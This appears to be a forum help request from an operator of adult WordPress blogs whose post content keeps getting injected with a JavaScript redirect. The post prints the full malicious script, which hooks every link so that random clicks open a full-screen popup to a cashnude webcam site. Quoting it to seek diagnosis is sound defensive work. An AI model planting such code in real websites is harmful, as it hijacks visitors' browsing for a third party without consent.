Hey!
We run plenty of adult blogs, recently some of them have been injected with a javascript redirect script. The place of injection: DB table wp_posts -> post_content
The JS code is added at the end of the post.
The script redirects to a webcam site by cashnude.
I have googled a lot, it seems not be a widespread.
Only could find how to remove the injected script, but the injection was back next day of course.
My server admin already spent a week to diagnose the hack, we changed all passwords possible including mysql passwords, we have no idea how the javascript is injected to the post.
Blogs with various WP plugins and WP themes have been injected,
however some older blogs with same plugins but older WP core have not been injected. The latest WP core 4.0 infected as well.
Does anybody have an experience with this JS redirect by cashnude?
Any response will be appreciated.
The malware code:
<script
type='text/javascript' rel="f179568d5746648ce97a252d9b3db074">
function
consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function
n(){if(!s){s=true;for(var
e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function
r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var
i=[];var s=false;var
o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else
if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var
aMs=document.getElementsByTagName("a");var
amSwindow=false;docReady(function(){for(var
e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var
t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})